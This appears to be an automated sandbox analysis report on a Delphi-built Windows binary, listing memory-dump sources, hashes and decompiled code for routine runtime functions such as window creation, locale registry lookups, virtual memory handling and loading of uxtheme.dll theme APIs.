Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: e967e88bf4823c906c35652e866f2c951335c9b81b0acec8bd7694e8e2c81172
Instruction ID: ea28b3e0b89b1852fe17bb3a960f078d753cdc915c187a2f1f11c42d493a1027
Opcode Fuzzy Hash: e967e88bf4823c906c35652e866f2c951335c9b81b0acec8bd7694e8e2c81172
Instruction Fuzzy Hash: 2CF027B2B006202BEB2056AA0C81F5366C4CF85794F184077FE0CFF3D9C27A8C0242A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406BE4, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406BE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402C98();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402C88(_t12);
				return _t22;
			}

0x00406beb
0x00406bf0
0x00406bf2
0x00406c21
0x00406c2a
0x00406c36

APIs

CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00406C21

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 05ccf17b2124ff4d4cee4c0e7c77d232d4f7fec68d285c8668bfd790e926e1b0
Instruction ID: 0e964218794f983bb9cd8bd5a4c19ac525971697ee49f243510a608c3f95afa3
Opcode Fuzzy Hash: 05ccf17b2124ff4d4cee4c0e7c77d232d4f7fec68d285c8668bfd790e926e1b0
Instruction Fuzzy Hash: D2F092B2604119BFDB80DE9EDD85E9B77ECEB4D264B01412ABA0CE7241D574ED1087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00405248, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405248(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E004054DC(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}

0x00405250
0x00405256
0x00405262
0x00405266
0x0040526f
0x00405274
0x00405276
0x0040527b
0x0040527d
0x00405280
0x00405280
0x0040527b
0x00405283
0x0040528e

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405266

Part of subcall function 004054DC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004054F7
Part of subcall function 004054DC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405515
Part of subcall function 004054DC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405533
Part of subcall function 004054DC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405551
Part of subcall function 004054DC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004055E0,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040559A
Part of subcall function 004054DC: RegQueryValueExA.ADVAPI32(?,0040575C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004055E0,?,80000001), ref: 004055B8
Part of subcall function 004054DC: RegCloseKey.ADVAPI32(?,004055E7,00000000,00000000,00000005,00000000,004055E0,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004055DA

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: f9c59cc811f721402053a0d0ac9b0ce6fcdbac75b8c4da85048b680b16bd63d6
Instruction ID: 952435f186fd52fa04dc92ae487686c42e4842c8c840e0a85f47681fa0619544
Opcode Fuzzy Hash: f9c59cc811f721402053a0d0ac9b0ce6fcdbac75b8c4da85048b680b16bd63d6
Instruction Fuzzy Hash: F5E06D71A017149FCB50DE98C8C1A9733D8AF08754F0009AAEC58EF386D3B4DD608BE8

Uniqueness

Uniqueness Score: -1.00%

Function 00407E58, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407E58(void* __eax, void* __edx) {
				int _t3;
				char* _t5;
				int _t7;
				int _t10;
				void* _t12;

				_t12 = __eax;
				_t3 = E004044A0(__edx);
				_t5 = E004046A0(__edx);
				_t7 = E004044A0(_t12);
				_t10 = CompareStringA(0x400, 1, E004046A0(_t12), _t7, _t5, _t3); // executed
				return _t10 - 2;
			}

0x00407e5c
0x00407e60
0x00407e68
0x00407e70
0x00407e85
0x00407e8f

APIs

CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,00407E9F,?,?,0040825D), ref: 00407E85

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: d2756fd8ef4fd80b28727ba66eddca8596a34e4d2668cf452345aa751b3a0bee
Instruction ID: a683a885328dd97e14061b284d8b7b125d665f2fecd80a81d0dc01761873f3db
Opcode Fuzzy Hash: d2756fd8ef4fd80b28727ba66eddca8596a34e4d2668cf452345aa751b3a0bee
Instruction Fuzzy Hash: 99D09EE13006102ED2507E7E6C82F5A008C4B8961DB41447AB309F62C2D9AD9D21026D

Uniqueness

Uniqueness Score: -1.00%

Function 0040177C, Relevance: 1.3, APIs: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040177C(signed int __eax, intOrPtr* __ecx, void* __edx) {
				signed int _v20;
				void* _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t20;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t48;
				void** _t49;
				signed int* _t50;
				void** _t51;

				_t51 =  &_v24;
				_t39 = __ecx;
				 *_t51 = __edx;
				_t49 =  &_v32;
				_t48 =  &_v36;
				_t50 =  &_v28;
				_v24 = __eax & 0xfffff000;
				_v20 =  *_t51 + __eax + 0x00000fff & 0xfffff000;
				 *__ecx = _v24;
				 *((intOrPtr*)(__ecx + 4)) = _v20 - _v24;
				_t20 =  *0x47b5e4; // 0x5ba724
				 *_t48 = _t20;
				while(0x47b5e4 !=  *_t48) {
					_t10 =  *_t48 + 8; // 0x0
					 *_t49 =  *_t10;
					 *_t50 =  *((intOrPtr*)( *_t48 + 0xc)) +  *_t49;
					if( *_t49 < _v24) {
						 *_t49 = _v24;
					}
					if( *_t50 > _v20) {
						 *_t50 = _v20;
					}
					if( *_t49 <  *_t50) {
						_t35 = VirtualAlloc( *_t49,  *_t50 -  *_t49, 0x1000, 4); // executed
						if(_t35 == 0) {
							 *_t39 = 0;
							return 0;
						}
					}
					 *_t48 =  *((intOrPtr*)( *_t48));
				}
				return 0x47b5e4;
			}

0x00401780
0x00401783
0x00401785
0x00401788
0x0040178c
0x00401790
0x0040179e
0x004017b1
0x004017b9
0x004017c3
0x004017c6
0x004017cb
0x0040182a
0x004017d1
0x004017d4
0x004017dd
0x004017e6
0x004017ec
0x004017ec
0x004017f5
0x004017fb
0x004017fb
0x00401803
0x00401815
0x0040181c
0x00401820
0x00000000
0x00401820
0x0040181c
0x00401828
0x00401828
0x0040183a

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401815

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e828e366203037f96a61da22dd7e75198f0bcdcc3e16c2bbf3280b2be461549c
Instruction ID: 932f869aee27061ec9432b523909e9d10fc31dc4fe3c75e66ba591c0c286ebc2
Opcode Fuzzy Hash: e828e366203037f96a61da22dd7e75198f0bcdcc3e16c2bbf3280b2be461549c
Instruction Fuzzy Hash: C321E0B5604246DFC750CF2CC880A9AB7E0FF98354F14892AF998DB3A4D334E944CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040183C, Relevance: 1.3, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040183C(void* __eax, void** __ecx, intOrPtr __edx) {
				intOrPtr _t20;
				int _t35;
				signed int* _t38;
				intOrPtr* _t44;
				void** _t45;
				intOrPtr* _t49;

				 *_t49 = __edx;
				_t45 = _t49 + 8;
				_t44 = _t49 + 4;
				_t38 = _t49 + 0xc;
				 *(_t49 + 0x10) = __eax + 0x00000fff & 0xfffff000;
				 *(_t49 + 0x14) = __eax +  *_t49 & 0xfffff000;
				 *__ecx =  *(_t49 + 0x10);
				__ecx[1] =  *(_t49 + 0x14) -  *(_t49 + 0x10);
				_t20 =  *0x47b5e4; // 0x5ba724
				 *_t44 = _t20;
				while(0x47b5e4 !=  *_t44) {
					_t10 =  *_t44 + 8; // 0x0
					 *_t45 =  *_t10;
					 *_t38 =  *((intOrPtr*)( *_t44 + 0xc)) +  *_t45;
					if( *_t45 <  *(_t49 + 0x10)) {
						 *_t45 =  *(_t49 + 0x10);
					}
					if( *_t38 >  *(_t49 + 0x14)) {
						 *_t38 =  *(_t49 + 0x14);
					}
					if( *_t45 <  *_t38) {
						_t35 = VirtualFree( *_t45,  *_t38 -  *_t45, 0x4000); // executed
						if(_t35 == 0) {
							 *0x47b5c0 = 2;
						}
					}
					 *_t44 =  *((intOrPtr*)( *_t44));
				}
				return 0x47b5e4;
			}

0x00401843
0x00401846
0x0040184a
0x0040184e
0x00401862
0x0040186f
0x00401877
0x00401881
0x00401884
0x00401889
0x004018e5
0x0040188f
0x00401892
0x0040189b
0x004018a3
0x004018a9
0x004018a9
0x004018b1
0x004018b7
0x004018b7
0x004018bd
0x004018cc
0x004018d3
0x004018d5
0x004018d5
0x004018d3
0x004018e3
0x004018e3
0x004018f5

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 004018CC

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4b430971f3da51b33c6ff197277bcc7b038da6347f6d05db9d7e968dd3773690
Instruction ID: b9677e816f5016dcd29266e224e189af4e18019ba84cb4f13ebd5ffe42c9e361
Opcode Fuzzy Hash: 4b430971f3da51b33c6ff197277bcc7b038da6347f6d05db9d7e968dd3773690
Instruction Fuzzy Hash: 3F2100B5604302DFC710DF28D880A1AB7E0FF89314F20896AE598DB354D330EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0041A898, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A898(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x47b8a0 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x47b89c; // 0xa80000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402C48(0x4793ec, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041A890(_t2, E0041A870);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041A890(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x47b8a0;
						 *0x47b8a0 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x47b89c = _t35;
				}
				_t25 =  *0x47b8a0;
				 *0x47b8a0 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x47b8a0;
			}

0x0041a8a6
0x0041a8b6
0x0041a8bb
0x0041a8bd
0x0041a8c2
0x0041a8c4
0x0041a8d1
0x0041a8db
0x0041a8e3
0x0041a8e6
0x0041a8e6
0x0041a8e9
0x0041a8e9
0x0041a8ec
0x0041a8f6
0x0041a8fb
0x0041a8fe
0x0041a900
0x0041a907
0x0041a90e
0x0041a90e
0x0041a916
0x0041a91b
0x0041a920
0x0041a926
0x0041a92d

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041A8B6

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: da2751bf1e6d8384520788fe734145a4a5e4c7a1f92e788c3d621b4f4502a7a3
Instruction ID: a98bfb044d1f20788cf98fbfa4edd2fcfb8e76fbf6e22a1b2e69f21d1a37deec
Opcode Fuzzy Hash: da2751bf1e6d8384520788fe734145a4a5e4c7a1f92e788c3d621b4f4502a7a3
Instruction Fuzzy Hash: 1F115A746003058BD710EF1AC881B86F7E4EF88360F10C53AE95C8B385D378E951CBAA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00424218, Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00424218(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x47ba50; // 0x2320b80
				E00424010(_t2);
				_push(_t111);
				_push(0x4245cb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x47ba4c =  *0x47ba4c + 1;
				if( *0x47ba48 == 0) {
					 *0x47ba48 = LoadLibraryA("uxtheme.dll");
					if( *0x47ba48 > 0) {
						 *0x47b988 = GetProcAddress( *0x47ba48, "OpenThemeData");
						 *0x47b98c = GetProcAddress( *0x47ba48, "CloseThemeData");
						 *0x47b990 = GetProcAddress( *0x47ba48, "DrawThemeBackground");
						 *0x47b994 = GetProcAddress( *0x47ba48, "DrawThemeText");
						 *0x47b998 = GetProcAddress( *0x47ba48, "GetThemeBackgroundContentRect");
						 *0x47b99c = GetProcAddress( *0x47ba48, "GetThemeBackgroundContentRect");
						 *0x47b9a0 = GetProcAddress( *0x47ba48, "GetThemePartSize");
						 *0x47b9a4 = GetProcAddress( *0x47ba48, "GetThemeTextExtent");
						 *0x47b9a8 = GetProcAddress( *0x47ba48, "GetThemeTextMetrics");
						 *0x47b9ac = GetProcAddress( *0x47ba48, "GetThemeBackgroundRegion");
						 *0x47b9b0 = GetProcAddress( *0x47ba48, "HitTestThemeBackground");
						 *0x47b9b4 = GetProcAddress( *0x47ba48, "DrawThemeEdge");
						 *0x47b9b8 = GetProcAddress( *0x47ba48, "DrawThemeIcon");
						 *0x47b9bc = GetProcAddress( *0x47ba48, "IsThemePartDefined");
						 *0x47b9c0 = GetProcAddress( *0x47ba48, "IsThemeBackgroundPartiallyTransparent");
						 *0x47b9c4 = GetProcAddress( *0x47ba48, "GetThemeColor");
						 *0x47b9c8 = GetProcAddress( *0x47ba48, "GetThemeMetric");
						 *0x47b9cc = GetProcAddress( *0x47ba48, "GetThemeString");
						 *0x47b9d0 = GetProcAddress( *0x47ba48, "GetThemeBool");
						 *0x47b9d4 = GetProcAddress( *0x47ba48, "GetThemeInt");
						 *0x47b9d8 = GetProcAddress( *0x47ba48, "GetThemeEnumValue");
						 *0x47b9dc = GetProcAddress( *0x47ba48, "GetThemePosition");
						 *0x47b9e0 = GetProcAddress( *0x47ba48, "GetThemeFont");
						 *0x47b9e4 = GetProcAddress( *0x47ba48, "GetThemeRect");
						 *0x47b9e8 = GetProcAddress( *0x47ba48, "GetThemeMargins");
						 *0x47b9ec = GetProcAddress( *0x47ba48, "GetThemeIntList");
						 *0x47b9f0 = GetProcAddress( *0x47ba48, "GetThemePropertyOrigin");
						 *0x47b9f4 = GetProcAddress( *0x47ba48, "SetWindowTheme");
						 *0x47b9f8 = GetProcAddress( *0x47ba48, "GetThemeFilename");
						 *0x47b9fc = GetProcAddress( *0x47ba48, "GetThemeSysColor");
						 *0x47ba00 = GetProcAddress( *0x47ba48, "GetThemeSysColorBrush");
						 *0x47ba04 = GetProcAddress( *0x47ba48, "GetThemeSysBool");
						 *0x47ba08 = GetProcAddress( *0x47ba48, "GetThemeSysSize");
						 *0x47ba0c = GetProcAddress( *0x47ba48, "GetThemeSysFont");
						 *0x47ba10 = GetProcAddress( *0x47ba48, "GetThemeSysString");
						 *0x47ba14 = GetProcAddress( *0x47ba48, "GetThemeSysInt");
						 *0x47ba18 = GetProcAddress( *0x47ba48, "IsThemeActive");
						 *0x47ba1c = GetProcAddress( *0x47ba48, "IsAppThemed");
						 *0x47ba20 = GetProcAddress( *0x47ba48, "GetWindowTheme");
						 *0x47ba24 = GetProcAddress( *0x47ba48, "EnableThemeDialogTexture");
						 *0x47ba28 = GetProcAddress( *0x47ba48, "IsThemeDialogTextureEnabled");
						 *0x47ba2c = GetProcAddress( *0x47ba48, "GetThemeAppProperties");
						 *0x47ba30 = GetProcAddress( *0x47ba48, "SetThemeAppProperties");
						 *0x47ba34 = GetProcAddress( *0x47ba48, "GetCurrentThemeName");
						 *0x47ba38 = GetProcAddress( *0x47ba48, "GetThemeDocumentationProperty");
						 *0x47ba3c = GetProcAddress( *0x47ba48, "DrawThemeParentBackground");
						 *0x47ba40 = GetProcAddress( *0x47ba48, "EnableTheming");
					}
				}
				_v5 =  *0x47ba48 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x4245d2);
				_t6 =  *0x47ba50; // 0x2320b80
				return E00424018(_t6);
			}

0x00424222
0x00424227
0x0042422e
0x0042422f
0x00424234
0x00424237
0x0042423a
0x00424243
0x00424253
0x00424258
0x0042426b
0x0042427d
0x0042428f
0x004242a1
0x004242b3
0x004242c5
0x004242d7
0x004242e9
0x004242fb
0x0042430d
0x0042431f
0x00424331
0x00424343
0x00424355
0x00424367
0x00424379
0x0042438b
0x0042439d
0x004243af
0x004243c1
0x004243d3
0x004243e5
0x004243f7
0x00424409
0x0042441b
0x0042442d
0x0042443f
0x00424451
0x00424463
0x00424475
0x00424487
0x00424499
0x004244ab
0x004244bd
0x004244cf
0x004244e1
0x004244f3
0x00424505
0x00424517
0x00424529
0x0042453b
0x0042454d
0x0042455f
0x00424571
0x00424583
0x00424595
0x004245a7
0x004245a7
0x00424258
0x004245af
0x004245b5
0x004245b8
0x004245bb
0x004245c0
0x004245ca

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,004245CB), ref: 0042424E
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00424266
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00424278
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042428A
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042429C
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004242AE
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004242C0
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 004242D2
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 004242E4
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 004242F6
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00424308
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042431A
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042432C
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042433E
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00424350
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00424362
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00424374
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 00424386
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00424398
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 004243AA
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 004243BC
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 004243CE
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 004243E0
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 004243F2
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00424404
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00424416
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00424428
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042443A
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042444C
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042445E
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00424470
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00424482
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00424494
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 004244A6
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 004244B8
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 004244CA
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 004244DC
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 004244EE
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00424500
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00424512
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00424524
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00424536
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00424548
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042455A
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042456C
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042457E
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00424590
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 004245A2

Strings

IsThemeActive, xrefs: 004244E6
GetThemeBackgroundRegion, xrefs: 00424300
IsAppThemed, xrefs: 004244F8
IsThemeBackgroundPartiallyTransparent, xrefs: 0042435A
EnableTheming, xrefs: 0042459A
CloseThemeData, xrefs: 00424270
GetThemePartSize, xrefs: 004242CA
uxtheme.dll, xrefs: 00424249
GetThemeMetric, xrefs: 0042437E
EnableThemeDialogTexture, xrefs: 0042451C
IsThemeDialogTextureEnabled, xrefs: 0042452E
GetThemeEnumValue, xrefs: 004243C6
GetThemeFont, xrefs: 004243EA
GetThemeSysFont, xrefs: 004244B0
DrawThemeText, xrefs: 00424294
GetThemeInt, xrefs: 004243B4
GetThemeSysString, xrefs: 004244C2
DrawThemeBackground, xrefs: 00424282
GetThemeIntList, xrefs: 00424420
GetCurrentThemeName, xrefs: 00424564
GetThemePosition, xrefs: 004243D8
DrawThemeIcon, xrefs: 00424336
GetThemeColor, xrefs: 0042436C
GetThemeMargins, xrefs: 0042440E
GetThemeSysInt, xrefs: 004244D4
GetThemeDocumentationProperty, xrefs: 00424576
OpenThemeData, xrefs: 0042425E
GetThemeTextMetrics, xrefs: 004242EE
IsThemePartDefined, xrefs: 00424348
HitTestThemeBackground, xrefs: 00424312
GetThemeSysBool, xrefs: 0042448C
GetThemeSysSize, xrefs: 0042449E
GetThemeTextExtent, xrefs: 004242DC
GetThemeSysColorBrush, xrefs: 0042447A
DrawThemeParentBackground, xrefs: 00424588
GetThemeString, xrefs: 00424390
GetThemeBool, xrefs: 004243A2
SetThemeAppProperties, xrefs: 00424552
GetThemeBackgroundContentRect, xrefs: 004242A6, 004242B8
GetThemeRect, xrefs: 004243FC
GetThemePropertyOrigin, xrefs: 00424432
GetThemeSysColor, xrefs: 00424468
GetThemeAppProperties, xrefs: 00424540
SetWindowTheme, xrefs: 00424444
DrawThemeEdge, xrefs: 00424324
GetThemeFilename, xrefs: 00424456
GetWindowTheme, xrefs: 0042450A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: 1586025007dd4470d93438c7318bad5f77b42c0ccb86624fa12d6baefe806d8e
Instruction ID: 310a7ac7441a288116e4f3ed37aa7e27f37c3cb6399d08c82e25568aefbc7210
